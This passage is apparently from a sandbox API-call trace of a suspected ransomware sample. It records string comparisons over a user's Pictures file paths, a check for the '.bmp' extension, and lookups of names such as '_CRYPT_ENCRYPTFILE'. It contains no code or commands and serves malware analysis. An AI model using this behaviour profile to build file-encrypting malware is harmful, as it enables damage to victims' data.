dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="luVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="at\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="26znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0188.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0188.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90add8 [0188.849] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0188.850] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0188.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0188.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b00 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0188.850] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1aa0 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0188.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0188.851] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0188.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0188.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0188.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0188.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0188.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0188.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0188.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0188.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.853] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.853] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0188.853] 